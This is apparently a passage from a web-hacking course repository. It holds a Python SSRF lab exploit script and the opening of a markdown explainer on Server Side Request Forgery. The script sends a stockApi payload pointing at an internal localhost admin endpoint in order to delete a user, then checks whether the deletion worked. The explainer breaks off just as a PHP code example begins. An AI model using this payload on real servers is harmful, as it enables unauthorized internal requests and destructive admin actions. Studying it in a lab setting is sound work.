https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-8.0_csrf/csrf_lab_no_defense_files/tailored-quote.png


--------------------------------------------------------------------------------
/lesson_notes/w-9.0_ssrf/ssrf_lab1.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | import requests
 4 | import sys
 5 | import urllib3
 6 | 
 7 | 
 8 | 
 9 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
10 | 
11 | def argv_check():
12 | 	if len(sys.argv) != 2:
13 | 		print("[!] Usage : %s  " %sys.argv[0])
14 | 		print("[!] Example : %s google.com" %sys.argv[0])
15 | 
16 | 
17 | def del_user(url):
18 | 	#url = sys.argv[1]
19 | 	path = "/product/stock"
20 | 	ssrf_payload = "http://localhost/admin/delete?username=carlos"
21 | 	params = {"stockApi":ssrf_payload}
22 | 	
23 | 
24 | 	r = requests.post(url+path,data=params,verify=False)
25 | 
26 | def check_exploit(url):
27 | 	path = "/product/stock"
28 | 	check_params = "http://localhost/admin"
29 | 	params = {"stockApi":check_params}
30 | 	
31 | 
32 | 	r = requests.post(url+path,data=params,verify=False)
33 | 	if "User deleted successfully" in r.text:
34 | 		print("[+] User carlos deleted successfully")
35 | 	else:
36 | 		print("[-] Exploit Fail")
37 | 
38 | 	
39 | 
40 | def main():
41 | 	url = sys.argv[1]
42 | 	argv_check()
43 | 	print("[+]Deleting user carlos....")
44 | 	del_user(url)
45 | 	check_exploit(url)
46 | 
47 | 
48 | 
49 | 
50 | 
51 | if __name__== "__main__":
52 | 	main()


--------------------------------------------------------------------------------
/lesson_notes/w-9.0_ssrf/ssrf_theory.md:
--------------------------------------------------------------------------------
  1 | # Server Side Request Forgery (SSRF)
  2 | 
  3 | ## SSRF Vulnerability
  4 | 
  5 | ![SSRF](../photo/ssrf1.png)
  6 | 
  7 | - SSRF stands for Server Side Request Forgery. It is a type of web application vulnerability that allows an attacker to make unauthorized requests from a vulnerable server to other internal or external servers.
  8 | 
  9 | 
 10 | - result in unauthorized actions or access to data within the organization either in the vulnerable application itself or on other back-end systems that the application can communicate with.
 11 | 
 12 | ## OWASP Top 10 vulnerability 
 13 | ![Top-10](../photo/ssrf2.png)
 14 | 
 15 | 
 16 | ## Example Vulnerable Code
 17 | 
 18 | ```php
 19 |